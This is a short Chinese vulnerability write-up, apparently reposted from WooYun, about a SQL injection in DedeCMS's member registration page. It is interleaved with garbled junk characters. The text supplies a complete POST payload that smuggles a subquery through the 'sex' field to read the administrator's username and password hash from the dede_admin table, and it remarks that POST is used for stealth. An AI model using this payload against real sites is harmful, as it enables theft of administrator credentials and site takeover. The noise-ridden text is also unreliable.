漏洞类型: SQL注射漏洞) W' Z Y3 p( ^) B U( t1 J
简要描述:
% h% y8 T8 I+ J' V+ n# J% y' u . L" |0 L) u/ @7 p' n
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞./ ]9 S1 g- n& v4 @$ M5 v( o
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
4 X2 V$ g: A5 I4 W详细说明:跟这个漏洞
; h' \) g9 g7 y, M. A( s 8 l* S) X6 b0 V' Q( J- h( j
WooYun: Dedecms SQL注射导致审核机制绕过漏洞$ a1 ^" Q1 l& L! [& @, b
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.# @3 u# v! V: r
POST提交以下数据,其实不用POST提交的,这样隐蔽点.5 A; ?, I" R7 S
5 C! \5 d$ F7 v1 x! n4 _ ?" ewww.political-security.com/member/reg_new.php5 A7 O1 }* F+ `- y: w. D4 c
' m1 O; s2 w2 q0 p3 v$ j
POST
9 {" I9 ]. S t' q ! j( Q+ X' m$ ~+ Z- v) @4 g1 A. J
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
, [% e+ z/ M0 {5 z% N# Juserid=c4rp3nt3r&uname=c4rp3nt3r, L7 b, c* @$ ]7 {5 b! q6 z2 J
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss* F4 m6 i/ w* ?/ P/ f% D) C+ k
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,: H1 a( n6 Q4 ?& k
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');( s, g P1 [4 o( O( y1 o' w
%00&vdcode=glos&agree= |